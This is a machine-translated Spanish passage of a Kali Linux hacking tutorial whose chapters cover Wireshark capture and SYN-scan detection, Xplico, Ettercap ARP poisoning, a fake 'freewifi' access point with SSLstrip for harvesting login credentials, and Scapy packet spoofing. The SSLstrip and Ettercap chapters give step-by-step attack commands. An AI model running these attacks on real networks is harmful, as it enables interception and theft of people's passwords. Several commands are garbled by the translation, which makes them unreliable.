Ahora, si su interfaz WLAN no es cero, sino 1 o 2, desea colocar el número correcto donde
hago referencia al cero con el número de su interfaz inalámbrica. Una vez que presione
enter, recibirá un mensaje que le indicará que el modo de monitor está habilitado en wlan0.

Ahora si escribes

“iwconfig” verás que la interfaz llamada “wlan0” ha desaparecido.


Ya no tiene una interfaz llamada "wlan0" y en su lugar, tiene una nueva interfaz llamada
"wlan0mon", pero si observa el modo de esta interfaz,
Machine Translated by Google

verás que está en modo “monitor”.

Después de eso, cada vez que desee utilizar un programa que requiera el modo de monitor,
asegúrese de configurar la interfaz en "wlan0mon".

En caso de que haya intentado habilitar el modo monitor usando el comando

"iwconfig"

y eso no funcionó y luego probó este método también, y aún así no funcionó, entonces es
probable que su adaptador no admita el modo de monitor porque no todos los adaptadores
admiten el modo de monitor. Por lo tanto, debe consultar el capítulo sobre adoptantes
recomendados.

Continuando, una vez que su interfaz esté en modo Monitor, debería estar capturando el
tráfico por aire. Una vez que haya recopilado suficientes datos, es hora de mostrarlos.

Dentro de Kali Linux, vaya a Aplicaciones, baje hasta las 10 mejores herramientas de
seguridad de Kali Linux y allí está Wireshark. Haga clic en esa pestaña y aparecerá la
aplicación Wireshark que enumera sus interfaces.

Seleccione su interfaz inalámbrica, en mi caso es wlan0mon, y haga clic en Iniciar para ver
los datos de captura. Si observa los paquetes capturados, debería ver que hay una
combinación de solicitudes para enviar, autorización para enviar, un marco de baliza y
algunos datos de usuario.

Ahora puede guardar todos estos datos haciendo clic en "Guardar" o "Guardar como" y
puede retirarlos y analizarlos en una fecha posterior. Así de fácil es capturar información
por aire.
Machine Translated by Google

Capítulo 21 Capturando el ataque de escaneo SYN

El escaneo TCP SYN se basa en el proceso de negociación de 3 vías para determinar qué
puertos están abiertos en un host de destino. El atacante envía un paquete TCP SYN a un
rango de puertos en la víctima, como si estuviera tratando de establecer un canal para la
comunicación normal en los puertos.

Cuando se ejecuta un escaneo SYN, el atacante buscará tres estados.


El puerto está abierto, cerrado o filtrado. El protocolo de enlace TCP normal funciona así.

Primero, se enviará un paquete SYN, luego el servidor responderá con un SYN/ACK y


finalmente, el cliente enviará un paquete ACK.

Ahora echemos un vistazo al escenario de puerto abierto. Si un servicio en la máquina de la


víctima está escuchando en el puerto, recibe el paquete SYN y responderá al atacante con
un paquete TCP SYN/ACK, y luego el atacante sabrá que el puerto está abierto y un servicio
está escuchando. eso.

Para el escenario de puerto cerrado, si ningún servicio está escuchando en un puerto


escaneado, el atacante no recibirá un paquete SYN/ACK. Dependiendo de la configuración
del sistema operativo de la víctima, pero el atacante podría recibir un paquete de reinicio a
cambio, indicando que el puerto está cerrado.

Por último, para el escenario de puerto filtrado, es posible que el atacante no reciba ninguna
respuesta. Eso podría significar que el puerto está filtrado por un dispositivo intermedio,
como un firewall o el propio host.

Por otro lado, podría ser que la respuesta se haya perdido en tránsito. En este escenario,
imagine que tiene tres hosts; el atacante que usará Kali Linux en 10.0.0.111, la máquina
víctima será un host con Windows 10 en 10.0.0.202, finalmente el probador de penetración
usará Kali Linux para interceptar todo el tráfico y analizar cualquier ataque a la red.

Imagínate que eres el atacante. Primero, el pirata informático ejecutará un escaneo de


puertos contra la máquina Windows 10 de su víctima, y usará nmap para escanear el host
de Windows en la dirección IP de 10.0.0.202. El comando que se usará aquí es:

“nmap 10.0.0.202”

Desde la perspectiva del atacante, el escaneo está completo, pero él no sabe que
Machine Translated by Google

un probador de penetración está escuchando en este momento en la red.

Si cambia a la máquina de prueba de penetración e intenta atrapar a este intruso, la mejor manera
de comprender el alcance de un escaneo es ver la ventana de conversaciones en Wireshark.

Arriba en el menú de Wireshark, seleccione el elemento "Estadísticas", luego haga clic en


"Conversaciones" y luego seleccione la pestaña "IPv4".

Allí, debería ver solo una conversación IPv4 entre el atacante en la dirección IP 10.0.0.111 y la
víctima en la dirección IP 10.0.0.202.

También verá que hay miles de conversaciones TCP entre estos dos hosts. Básicamente, una
nueva conversación para cada puerto involucrado en las comunicaciones, que es mucho.

Una vez que comprenda los diferentes tipos de respuestas que puede producir un escaneo SYN,
el siguiente pensamiento lógico es encontrar un método rápido para identificar qué puertos están
abiertos o cerrados.

La respuesta se encuentra dentro de la ventana de conversaciones. Una vez más, haga clic en la
pestaña "TCP". En esa ventana, puede ordenar las conversaciones TCP por "número de paquete"
con los valores más altos en la parte superior, haciendo clic dos veces en la columna "Paquetes".

Luego deberá hacer clic en “puertos escaneados” e incluir 3 paquetes en cada una de sus
conversaciones. Puede echar un vistazo a los detalles del primer paquete de la lista haciendo clic
en el botón "Seguir transmisión", luego cierre esta ventana y minimice la ventana de conversaciones.

De vuelta en la ventana principal de Wireshark, debería ver el paquete SYN inicial enviado desde
la máquina del atacante, y luego el paquete SYN/ACK correspondiente del host de la víctima y el
paquete de reinicio final enviado desde el host del atacante para finalizar la conversación.

Si vuelve a cambiar a la ventana "Conversaciones", también puede tener otros escenarios en los
que solo 2 paquetes participan en la comunicación.

Si revisa los detalles nuevamente, verifique el primer paquete SYN inicial y el segundo que es el
restablecimiento de la víctima, lo que indica que este puerto está cerrado.

Si las entradas restantes en la ventana de "conversación" incluyen solo un paquete, eso significa
que el host de la víctima nunca respondió al SYN inicial
Machine Translated by Google
Machine Translated by Google

Capítulo 22 Captura de tráfico con Xplico

Podemos lanzar un ataque Man in the Middle de múltiples maneras, ya sea usando Burp
Suite o EtterCAP; pero nunca hemos discutido cómo podemos recopilar los datos y
analizarlos y qué herramienta podemos usar para ese propósito.

Hemos discutido un software llamado Wireshark anteriormente y cómo podemos capturar


datos con él, sin embargo, hay otra utilidad que podemos usar para el mismo propósito
llamada "Xplico".

Xplico también puede tomar archivos de Wireshark y analizarlos por usted. Wireshark
también tiene la capacidad de hacer una alimentación directa a Xplico, por lo tanto,
podemos capturar todo el tráfico y puede brindar otra excelente vista de lo que sucede
dentro de esa sesión que estamos escuchando a escondidas.

Xplico también viene como una herramienta integrada predeterminada dentro de Kali Linux.
Para iniciar la interfaz gráfica de usuario, puede seguir las opciones de menú como: Kali

Linux > Forensics > Network Forensics > xplico web gui Una vez que haya seleccionado

las opciones de menú mencionadas, se iniciará un servidor web en Kali. Si el servidor web
Apache aún no se está ejecutando, normalmente debe iniciarlo manualmente; pero si usa
su máquina Kali, automáticamente la iniciará por usted.

Si Apache ya se está ejecutando en segundo plano, Xplico usará esa función de servidor
para iniciarse. A continuación, le diría que use una URL específica para abrir Xplico, usando
un servidor web.

Puede optar por hacer clic en el enlace provisto para abrir Xplico, o simplemente puede
copiar y pegar la dirección en la sesión de su navegador. El enlace es: http://localhost:9876/
Otro método para iniciar Xplico es hacer clic con el botón derecho en el enlace

proporcionado, luego seleccionar Abrir enlace y se abrirá en el navegador predeterminado;


pero es justo mencionar que algunas de las funciones del menú no siempre funcionan en
el navegador predeterminado.

Por lo tanto, le sugiero que use el navegador Firefox copiando y pegando el enlace provisto.
A continuación, Xplico abriría una interfaz gráfica de usuario basada en la web que requeriría
que inicie sesión con los siguientes detalles:

ÿ Usuario: xplico
Machine Translated by Google

ÿ Contraseña: xplico Una

vez que haya iniciado sesión como xplico, para analizar los datos que capturó previamente en la
interfaz de red ethernet0, debe crear un nuevo caso haciendo clic en una opción de menú: Caso
> nuevo caso > Adquisición en vivo.

Si desea analizar un archivo existente que ha guardado anteriormente, puede optar por hacer clic
en la barra de radio llamada: "Cargando archivo/s de captura PCAP"

Una vez que crea un caso, puede nombrarlo del proyecto que esté haciendo, luego puede crear
varias sesiones dentro de cada proyecto y comenzar a verlas.

Xplico proporcionará una visibilidad clara de cualquier sitio web, imágenes o videos que la víctima
haya visitado, ya sea como un formato de captura en vivo o reproduciéndolos en cualquier otra
fecha en cualquier momento.

Asimismo, podemos capturar tráfico VOIP (Voice over IP), que también podemos falsificar, borrar
o escuchar en cualquier momento en el futuro. Xplico es más que una herramienta de captura de
datos, pero debido a su poder también es conocida como una muy buena herramienta de piratería.
Machine Translated by Google

Capítulo 23 Ataque MITM con Ettercap

En este capítulo, discutiremos cómo usar Ettercap para capturar credenciales, específicamente
nombres de usuario y contraseñas de un objetivo que usa HTTP y FTP.

Esto es posible si el objetivo utiliza dos protocolos no cifrados, como HTTP y FTP. En la
configuración, tenemos un sistema Linux y Windows 10, y vamos a usar Ettercap para
ubicarnos en el medio entre la puerta de enlace predeterminada, que es la máquina host de
Windows.

Para obtener la dirección de la puerta de enlace predeterminada, debe escribir en una

terminal; “ruta ip”

En mi caso, la puerta de enlace predeterminada es 192.168.100.1, pero sea cual sea la


dirección que tenga, esta es la información principal que necesita saber para que Ettercap funcione.

Técnicamente, puede colocarse entre todos en una subred y la puerta de enlace


predeterminada o el objetivo individual si lo desea. En este escenario, nos pondremos entre
todos y la puerta de enlace predeterminada.

Primero dentro de Kali Linux, vaya a "Aplicaciones", luego desplácese hacia abajo y
seleccione "Sniffing and Spoofing" y luego seleccione "Ettercap-g". Esta es la GUI para
Ettercap. Una vez que la GUI esté abierta, seleccione "olfatear" y luego seleccione "olfateo
unificado" y aparecerá la siguiente ventana.

En la nueva ventana que ahora está abierta llamada "Entrada de mayúsculas y minúsculas",
le preguntará en qué interfaz de red desea olfatear. Solo hay una NIC o tarjeta de interfaz de
red en nuestras máquinas Kali, que es lo que unifica la detección.

Por lo tanto, independientemente de la interfaz que se muestre, debe elegir esa, así que
seleccione "Aceptar". A continuación, antes de ponernos en el medio con Ettercap, tenemos
que configurar el objetivo. Para hacer esto, seleccione "hosts" y luego "buscar hosts".

Esto escaneará la subred en la que se encuentra su objetivo. Solo puede ponerse en el medio
de una subred determinada con "envenenamiento arp", que es lo que vamos a usar.

Una vez que se completó el escaneo, regrese y seleccione "hosts", luego "lista de hosts" y en
la nueva ventana, debería ver las direcciones IP que encontró el escaneo anterior.
Aquí también debe encontrar la dirección IP de su puerta de enlace predeterminada, que en
mi caso es 192.168.100.1.
Machine Translated by Google

Ahora debe crear objetivos, por lo que si hace clic en la dirección IP 192.168.100.1 o en la
dirección IP que sea su puerta de enlace predeterminada, seleccione "Agregar al objetivo 1".

A continuación, si tiene más direcciones IP en la lista, también desea apuntarlas, por lo que una
vez más, puede resaltarlas haciendo clic en ellas y luego haga clic en "Agregar al objetivo 2".

Una vez que haya seleccionado sus objetivos, vaya a la ventana superior, luego seleccione
"Mitm", esto se refiere a "hombre en el medio" y luego puede seleccionar "envenenamiento por arp".
Una vez que haya seleccionado estos, aparecerá una nueva ventana, debe marcar "Sniff remote
connections" y hacer clic en "ok"

Si está en el medio, o debería decir si la máquina Kali Linux está en el medio entre la máquina
con Windows 10 y la puerta de enlace predeterminada, la dirección MAC para la dirección IP
192.168.100.1 debería ser la dirección MAC de la máquina Kali Linux. Para verificar eso, debe
ir a la línea de comando de la máquina con Windows 10 y escribir: “arp-a”

Arp significa Protocolo de resolución de direcciones, y lo que hace es que traduce las direcciones
Mac a direcciones IP, y una vez que use ese comando en Windows, debería ver la lista de
direcciones IP y al lado de cada una de sus direcciones MAC asociadas.

Por cierto, asegúrese de no confundirse, ya que Windows hace referencia a las direcciones IP
como "Direcciones de Internet" y hace referencia a las direcciones MAC como "Direcciones
físicas".

Como ve, las "Direcciones físicas" son técnicamente incorrectas porque al usar Ettercap acaba
de cambiar la dirección Mac de su puerta de enlace predeterminada, pero para estar 100%
seguro, también puede verificar la dirección mac de Kali Linux.

Para hacer eso, regrese a la terminal Kali Linux y escriba:

"ifconfig"

Y dentro de la salida que le muestra este comando, busque el término "éter" que hace referencia
a la MAC o "dirección física" de su dirección Ethernet de Kali Linux.

Una vez que verificó y la dirección de Kali ether es la misma que la puerta de enlace
predeterminada de Windows, sabrá que está en el medio con Ettercap. Ahora el
Machine Translated by Google

Lo bueno de Ettercap es que cuando estás en el medio, todo lo que tienes que hacer es
ejecutarlo.

Dentro de su ventana de Ettercap, en la parte inferior, si ve alguna credencial pasada en


texto claro, la capturará en esa ventana. Dentro de la ventana de Ettercap verá el nombre
de usuario junto a “USUARIO” y la contraseña junto a “PASS”.

Simplemente aparecerá en el lado izquierdo automáticamente, así que no tienes que


hacer mucho. Por ejemplo, no tiene que sentarse allí y mirar todo el tráfico como con
Wireshark, ya que aparecen tanto el nombre de usuario como la contraseña.

Ettercap captura cualquier nombre de usuario y contraseña si se utilizan protocolos no


cifrados, por lo tanto, en lugar de HTTP, HTTPS debe ser usuario, mientras que, en lugar
de FTP, debe usar SFTP o SCP para transferir archivos.

El usuario final nunca se da cuenta mientras usted está en el medio porque no hay un
cartel de advertencia que aparezca para el usuario, por lo que no se dará cuenta si realiza
un ataque de hombre en el medio de capa 2 con Ettercap.

Por último, le volveré a pedir que se asegure de que tiene una autorización por escrito
para usar este método en un entorno de producción o en vivo, ya que cualquier tipo de
ataque Man in the Middle es muy peligroso.
Machine Translated by Google

Capítulo 24 Ataque MITM con SSLstrip

En este capítulo, le enseñaré cómo crear un punto de acceso falso en una máquina
virtual Kali Linux. Para completar este ataque, necesitará tener un adaptador de red USB
que admita tanto el modo monitor como el modo maestro.

Si no tiene un adaptador de red USB que admita estos modos de red, el adaptador de
red que le recomiendo es el Alpha del que hablé anteriormente. Solo cuesta alrededor
de $ 50 y puede comprar uno en Amazon y en algunos otros lugares.

Antes de comenzar, quiero explicar cómo funciona este ataque. Para ilustrarlo, déjame
darte una descripción general de alto nivel de cómo funciona este ataque. Los
componentes principales incluyen a la víctima, el atacante, el punto de acceso falso y un
enrutador con conexión a Internet.

Lo que sucede es que el atacante está conectado a Internet y compartirá esa conexión a
Internet a través de un adaptador de red USB que actúa como un punto de acceso falso.

Cuando alguien se conecte a ese punto de acceso falso, podrá acceder a Internet.
Déjame guiarte a través de este proceso. Lo primero que sucederá es que la víctima se
conectará al punto de acceso falso, luego el tráfico de Internet de la víctima se enrutará
a través del punto de acceso falso hacia el atacante.

Una vez que el atacante obtiene el tráfico de Internet de las víctimas, el atacante
manipulará y registrará el tráfico de Internet de las víctimas con la tira SSL y esto permitirá
que el atacante obligue a la víctima a usar HTTP, que como resultado también permitirá
que el atacante capturar cualquier nombre de usuario y contraseña que ingrese la víctima.

Una vez que la tira SSL haya terminado de manipular y registrar el tráfico de Internet de
las víctimas, el atacante reenviará el tráfico de Internet de las víctimas al enrutador.
Finalmente, el enrutador enrutará el tráfico de Internet de las víctimas a cualquier sitio
web con el que la víctima esté intentando comunicarse.

Lo que hacemos aquí es que nos ubicamos entre la víctima y el sitio web para que, como
consecuencia, podamos ver cualquier interacción que ocurra entre la víctima y el sitio
web, y esto también se conoce como un hombre en el -ataque medio.
Machine Translated by Google

Eso concluye la explicación, así que sigamos adelante y comencemos con el ataque.
Lo primero que debemos hacer es conectarnos a Internet, y lo lograremos
compartiendo la conexión a Internet de nuestro sistema operativo host con nuestra
máquina virtual Kali Linux.

Básicamente, se trata de una conexión de red con puente o cableada y he elegido


hacerlo de esta manera para poder eliminar la necesidad de un segundo adaptador
de red USB, pero tenga en cuenta que si tiene un segundo adaptador de red USB,
puede usar para conectarse a Internet directamente desde su máquina virtual Kali Linux.
En su lugar, voy a mostrarnos el método que estoy a punto de compartir con ustedes.
Avancemos e iniciemos sesión en nuestro sistema operativo host. No importa en qué
tipo de computadora esté ejecutando su máquina virtual Kali Linux, siempre que
pueda usarla para conectarse a Internet.

Primero, continúe y abra la configuración de red o cualquier aplicación de


administración de red que use su sistema operativo. Puedo acceder al mío desde la
barra de menú superior y luego busquemos una red inalámbrica a la que conectarnos.

Tenga en cuenta que puede conectarse a cualquier red que desee siempre que tenga
una conexión a Internet y, si tiene un dispositivo móvil, puede conectarse a su Android
o iPhone que use un módem USB 4G, un punto de acceso móvil o lo que sea. medio
de una conexión a Internet que tenga.
Una vez conectado a Internet en su sistema operativo host, debe compartirlo con
nuestra máquina virtual Kali Linux.

Entonces, ahora, continúe y muévase a nuestra máquina virtual Kali Linux, y en la


barra de menú superior debe abrir el menú de la máquina virtual y luego expandir el
menú del adaptador de red.
Si tiene varios adaptadores de red, use el que está en la parte superior. Debería
llamarse adaptador de red y no debería tener ningún número detrás.
Aquí, debemos asegurarnos de que hemos configurado nuestro adaptador de red
para usar la detección automática en puente y esto nos permitirá obtener una dirección
IP y una conexión a Internet desde el enrutador al que está conectado nuestro sistema
operativo host.

Una vez que haya realizado esa configuración, puede continuar y permitir que el
menú de la máquina virtual se colapse y ahora podemos usar esa red virtual para
establecer una conexión a Internet.
Machine Translated by Google

A continuación, abramos nuestro administrador de red, por cierto, puede usar cualquier
administrador de red que tenga, y aquí, debe encontrar la opción que dice "Red cableada"
y luego hacer clic en "conectar".

Si está utilizando el administrador de red predeterminado, debe conectarse automáticamente,


pero si no lo está, es posible que deba reiniciar su máquina virtual y se le debe proporcionar
una conexión.

Si aún tiene problemas, le recomiendo que instale el administrador de red "Wicd".


Continuando, ahora que tenemos una conexión a Internet, necesitamos encontrar la
dirección IP de nuestra puerta de enlace y anotarla.

Sigamos y cerremos el administrador de red, y abramos una terminal donde debe escribir:
"espacio de ruta -n" y luego presione ENTER, y siga adelante y busque la dirección IP de

su puerta de enlace. En mi configuración es 192.168.0.1, y debemos tomar nota de esto

porque lo usaremos en un comando futuro.

Puede abrir un bloc de notas o, si lo desea, puede usar una hoja de papel que sea
conveniente para usted y escribir la dirección IP de su puerta de enlace. Ahora que hemos
tomado nota de la dirección IP de nuestra puerta de enlace, necesitamos instalar el servidor DHCP.

De vuelta a la terminal de Kali, vamos a escribir; “apt-get

install dhcp3-server” y luego presione ENTER. Solo sea

paciente y permita suficiente tiempo para terminar de instalar el servidor DHCP, y una vez
que la instalación esté completa, debemos configurar nuestro servidor DHCP.

Volviendo a la terminal, escribamos;

“nano /etc/dhcpd.conf” y luego

presione enter, y debería tener un archivo de configuración de DHCP D en blanco. Si no


está en blanco por alguna razón, simplemente continúe y elimine todo el contenido y cuando
esté listo, comencemos a agregar nuestra configuración.

Primero tenemos que teclear:

"autoritario;

y luego presione ENTER y baje una línea, y luego escriba;


Machine Translated by Google

“tiempo de arrendamiento predeterminado 600;

y luego presione ENTER para bajar una línea y escriba; “tiempo

máximo de arrendamiento 7200;”

y luego presione ENTER para bajar una línea, y luego escriba;

“subred 192.168.1.0 máscara de red 255.255.255.0 {

Arriba después del espacio, se llama "corchete rizado orientado hacia adelante" y luego presione
ENTER, y baje una línea y luego escriba;

enrutadores opcionales

192.168.1.1; y luego presione ENTER para bajar una línea y escribir;

“opción máscara de subred 255.255.255.0;”

Luego presione ENTER y baje una línea y escriba; “opción de

nombre de dominio “freewifi”; Luego presione ENTER y baje una

línea y escriba; “opción servidores de nombres de dominio

192.168.1.1; y luego presione ENTER y baje una línea y escriba;

“rango 192.168.1.2 192.168.1.30; }

y luego presione ENTER para bajar una línea y luego ingrese un corchete que mira hacia atrás.
Eso es todo lo que necesitamos para entrar. Una vez más, su configuración debería verse así:

autoritario;
tiempo de arrendamiento
predeterminado 600; tiempo
máximo de arrendamiento 7200; subred 192.168.1.0
máscara de red 255.255.255.0 { opción enrutadores
192.168.1.1; opción máscara de subred 255.255.255.0;
opción nombre de dominio “freewifi”; opción
servidores de nombres de dominio 192.168.1.1; rango
192.168.1.2 192.168.1.30;
Machine Translated by Google

A continuación, debe guardar los cambios que hemos realizado, así que presione las teclas
"ctrl + x" y luego para guardar el archivo. Debe presionar la tecla "Y" y luego escribir el archivo
y cerrarlo.

Debe presionar ENTER, y ahora necesitamos encontrar el nombre de nuestro adaptador de


red USB, así que adelante, conecte su adaptador de red USB si aún no lo ha hecho, y en la
terminal debemos escribir:

"airmon-ng" y

presione enter, y debería ver el nombre de su adaptador de red a continuación. El mío se


llama "wlan0", el tuyo probablemente sea algo similar. Ahora que sabemos el nombre de
nuestro adaptador de red, debemos iniciar el modo de monitor, así que escribamos; “airmon-
ng start wlan0” y luego presione enter, y déle un momento para crear una interfaz de monitor

para usted. Aparecerá un mensaje para decir que se ha creado una interfaz de monitor y se

llama "mon0".

Ahora necesitamos crear nuestro punto de acceso falso, así que escribamos;

“Base aérea -ng –c 11 -e freewifi mon0”

Para “mon0” debe ingresar el nombre de la interfaz de su monitor. En el caso mío, es "mon0",
luego presione enter y ahora que nuestro punto de acceso falso está en funcionamiento,
debemos hacer algunos ajustes en nuestra interfaz de túnel, que es una interfaz que "airbase"
creó automáticamente para nosotros cuando iniciamos nuestro punto de acceso falso. .

Por lo tanto, abramos una nueva terminal, pero no cerremos la terminal en la que estamos
ejecutando una base aérea, porque la necesitamos para continuar operando. En la nueva
terminal, vamos a escribir; "ifconfig at0 192.168.1.1 máscara de red 255.255.255.0" y luego

presione enter. Ahora necesitamos ajustar la MTU, que significa unidades máximas de

transmisión. Lo que hace MTU es que permite que nuestra interfaz de túnel transmita paquetes
más grandes para que podamos evitar la fragmentación de paquetes.

En términos más simples, esto permite que nuestro punto de acceso falso administre mayores
Machine Translated by Google

volúmenes de tráfico de Internet, que es generado por cualquiera que se conecte a nuestro punto de acceso
falso. En la terminal, escribamos;

Ififff a las 0 1400 persona ”

y luego presione Entrar. Ahora necesitamos agregar una tabla de enrutamiento, así que escribamos;

“Agregar ruta -net 192.168.1.0 máscara de red 255.255.255.0 GW 192.168.1.1”

y luego presione Entrar. Ahora necesitamos habilitar el reenvío de IP y crear algunas reglas de tablas de IP
para que podamos usar nuestra interfaz de túnel para enrutar el tráfico entre nuestro punto de acceso falso y

nuestra fuente de Internet. Por lo tanto, necesitamos escribir; “echo 1 > /proc/sys/net/ipv4/ip_forward” y luego

presione Enter. Ahora necesitamos ingresar las reglas de nuestras tablas de IP, así que escribamos; "iptables

-t nat --A PREROUTING -p udp -j DNAT --to 192.168.0.1"

Aquí, debemos ingresar la dirección IP de la puerta de enlace que anotamos anteriormente, y la mía es
192.168.0.1, luego presione ENTER. Ahora tenemos que escribir; "iptables -P ADELANTE ACEPTAR"

Las palabras reenviar y aceptar deben escribirse en mayúsculas y luego presionar ENTER. Ahora tenemos
que escribir; “iptables --append FORWARD – in-interface at0 -j ACCEPT” y luego presione Enter. Ahora

tenemos que escribir;

“iptables –table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE”

y luego presione Entrar. Finalmente, necesitamos escribir;

“iptables -t nat –A PREROUTING -p tcp –destination-port 80 -j REDIRECT --port 10000” y luego

presione Enter. Ahora que hemos creado nuestras reglas de iptables, debemos iniciar nuestro servidor DHCP.
Así que escribamos;

“dhcpd –cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0” y luego presione Enter.

Luego escriba; "/etc/init.d/isc-dhcp-server start" y luego presione enter, y

debería ver allí que el servidor DHCP se inició correctamente. Básicamente,

debería decir:

“[….] Iniciando el servidor DHCP de ISC: dhcpd”


Machine Translated by Google

Ahora es el momento de iniciar la franja SSL, así que

escribamos; “sslstrip -f -p -k 10000” y luego presione enter.

Por último, pero no menos importante, debemos comenzar a editar la aplicación, así que abramos
una nueva terminal pero no cerremos la terminal en la que estamos ejecutando una tira de SSL.
En la nueva terminal vamos a escribir; "ettercap -p -U -T -q -i at0"

y luego presione Entrar. Ahora que tenemos SSL strip y ethercap ejecutándose, hemos terminado
de configurar el ataque. Ahora podemos simular una víctima para que podamos usar nuestro
punto de acceso falso para capturar algunos nombres de usuario y contraseñas.

Entonces, si salta a la computadora de la víctima, lo primero que puede hacer es conectarse al


punto de acceso falso. Abra el administrador de red y escanee las redes inalámbricas cercanas,
y debería ver allí nuestro punto de acceso falso llamado "freewifi".

Continúe y conéctese y suponiendo que configuramos todo correctamente, debería tener una
conexión a Internet. Verifique y vea si tiene una dirección IP asignada del grupo de DHCP que
hemos creado anteriormente.

En el ejemplo que he proporcionado, hemos creado un servidor DHCP que puede asignar
direcciones IP a los dispositivos conectados, y hemos creado un rango entre 192.168.1.2 y
192.168.1.30 con el comando

“rango 192.168.1.2 192.168.1.30”

En la configuración de DHCP. Entonces, la dirección IP de su víctima debe estar dentro de ese


rango. Como víctima, puede iniciar sesión en su página de Facebook y descubrirá si la franja SSL
funciona o no.

Puedes usar Firefox o Google Chrome, y verás que si intentas escribir en el navegador https://
www.facebook.com, cambiará la dirección a www.facebook.com

Esto significa que la franja SSL está funcionando y si observa la pestaña superior izquierda del
navegador, verá un icono de candado.

Este es un ícono que SSL strip coloca allí para agregar un poco de legitimidad y esto evita que la
víctima sospeche demasiado, porque ven este candado y automáticamente asumen que debe ser
seguro.

Entonces, adelante, ingrese un correo electrónico y una contraseña en Facebook. Tu usas


Machine Translated by Google

utilice un nombre de usuario y una contraseña ficticios, como "testuser" y utilice la contraseña
"password123".

No importa qué nombre de usuario o contraseña uses, ya que el objetivo no es que inicies sesión
en Facebook, sino el hecho de que podemos capturar las credenciales del nombre de usuario y la
contraseña.

Antes de hacer clic en iniciar sesión, vuelva a la máquina del atacante y monitoreemos en la
terminal de ettercap. Ahora puede seguir adelante y hacer clic en iniciar sesión en Facebook, y si
mira la terminal de Ettercap, debería ver los datos que llegan.

Debe observar tanto el nombre de usuario junto al campo "USUARIO" como la contraseña junto
al "PASS" archivado.

Si probara el ejemplo con un sitio web de banca en línea, es muy probable que el nombre de
usuario y la contraseña no aparezcan en el terminal de Ettercap, pero aparecerán en los registros
de tiras de SSL.

Puede intentar iniciar sesión en las cuentas y no verá el nombre de usuario y la contraseña en la
terminal, pero la tira SSL los tomará y los colocará en un registro.

Entonces, continúe y regrese a la computadora del atacante, y aquí debe abrir una nueva terminal
y escribir;

"cat sslstrip.log"

y luego presione Entrar. Ahora, debería ver tanto el nombre de usuario como la contraseña.

Los detalles del usuario aparecerán en los registros como "userId=username" y la contraseña
aparecerá como "auth_passwd=password"

Esos son todos los ejemplos que quería compartir contigo pero ten en cuenta que este ataque es
expandible.

Por ejemplo, existe una herramienta llamada "karma" y lo que hace es que cuando una
computadora busca una red inalámbrica para conectarse específicamente a una red inalámbrica
a la que se conectó en el pasado, envía solicitudes de sondeo.

Bueno, podemos crear algo que nos permita aceptar esas solicitudes de sondeo y luego falsificar
la red inalámbrica que la persona está buscando.

Cuando responda, pensarán que encontraron esa red inalámbrica y su computadora se conectará
automáticamente. Hay muchas cosas
Machine Translated by Google

puedes hacerlo con esto, pero por ahora es hora de pasar al siguiente ataque.

Puede cerrar la terminal que usamos para ver el registro de strip de SSL. Luego, para
detener ettercap, deberá presionar las teclas ctrl y C y luego podrá cerrar esa terminal.

Luego, para detener la tira SSL, puede presionar ctrl + C para cerrar la terminal. Para
detener su punto de acceso falso, también presione ctrl + C en la ventana de kali y luego
cierre la terminal.

Todas las reglas de iptables que hemos creado se restaurarán automáticamente a sus
valores predeterminados cuando reinicie su máquina virtual.

Asegúrese de tener una autorización por escrito antes de usar SSLstrip, incluidas las
variaciones relacionadas con esta herramienta. Si solo está practicando en el laboratorio
de su casa, en un entorno que no sea de producción, eso no debería causar ningún
problema a nadie; aún así, te sugiero que apagues tu enrutador y practiques con cuidado
sin ninguna conexión a Internet.
Machine Translated by Google

Capítulo 25 Manipulación de paquetes con Scapy

Scapy es una herramienta avanzada de manipulación de paquetes que no se recomienda para


principiantes. Sin embargo, es justo mencionar que esta herramienta existe y ciertamente
puede actuar como el rey de todas las herramientas de piratería que existen.

Scapy puede ayudarlo a crear prácticamente cualquier paquete que desee, sin ningún
problema. Imagínese que está a punto de administrar y validar una configuración en un
Firewall, y una de las políticas dicta que implemente la siguiente regla: “Cualquier paquete
iniciado desde la dirección de entrada a la dirección de salida no está permitido, por lo que

debe denegarse si la dirección IP de destino la dirección es la misma que la dirección IP de


origen”.

Esta solicitud de regla de firewall, por supuesto, tiene mucho sentido, pero también suena un
poco poco realista. Solo piense en cómo es posible que una PC envíe una solicitud desde su
propia dirección IP a la dirección de salida donde la dirección IP de destino sería exactamente
la misma dirección IP que la PC del remitente.

eso es imposible verdad?

Bueno, técnicamente es posible, porque podría tratarse de un paquete malicioso.

Alguien puede estar a punto de ejecutar un escaneo de puertos dentro de la organización para
obtener datos sobre los dispositivos de red y sus vulnerabilidades para lanzar un ataque
estratégico, que podría dañar, deshabilitar, clonar o incluso apagar todo el sistema, y parecería
que fue se originó desde el interior de la red privada.

Entonces, ¿cómo es eso posible? Bueno, la herramienta se llama Scapy. Scapy es


probablemente la herramienta de manipulación de paquetes más poderosa y flexible que está
integrada en Kali Linux, escrita por Phyton.

Con Scapy, al abrir la interfaz de línea de comandos, podemos iniciarlo y crear un paquete, y
la mejor parte es que podemos especificar prácticamente cualquier cosa:

ÿ Cualquier dirección IP de origen,


ÿ Cualquier dirección IP de destino, ÿ
Tipo de servicio, ÿ Podemos crear una
dirección IPv4 o una dirección IPv6, ÿ Cambiar cualquiera de
los campos del encabezado,
Machine Translated by Google

ÿ Cambie el número de puerto de destino, ÿ


Cambie el número de puerto de origen y más.

Además, para crear un paquete único, Scapy también puede: ÿ


Capturar cualquier tráfico, ÿ Reproducir o reproducir
cualquier tráfico, ÿ Buscar puertos, ÿ Descubrir dispositivos
de red y más.

Scapy funciona en Kali Linux, y para iniciarlo en la interfaz de línea de comandos,


escriba: "scapy"

Luego presiona enter. Debido a que hay tantas posibilidades con scapy, comencemos
con algo sencillo y sería un comando de envío básico:

“enviar(IP(src=''10.10.10.20'' ,dst=''10.10.10.2'')/ICPM()/''Nuestra carga útil''#)”


Lo que este comando de creación de paquetes significa aquí es que quiero enviar un
ping desde la dirección IP de origen 10.10.10.20 a la dirección IP de destino 10.10.10.2.

Además, quiero que este paquete se vea como una solicitud de eco ICMP, pero quiero
que incluya un Payload llamado OurPayload. Scapy es un rompedor de reglas.
Por lo tanto, no tenemos que hacer nada exactamente como debe ser según los
protocolos de red adecuados, sino que podemos crear paquetes que lógicamente
nunca se encontrarían en la red.

Al enviar paquetes manipulados a múltiples destinos, podríamos simplemente esperar


las respuestas y echarles un vistazo y ver si podríamos haber creado algún
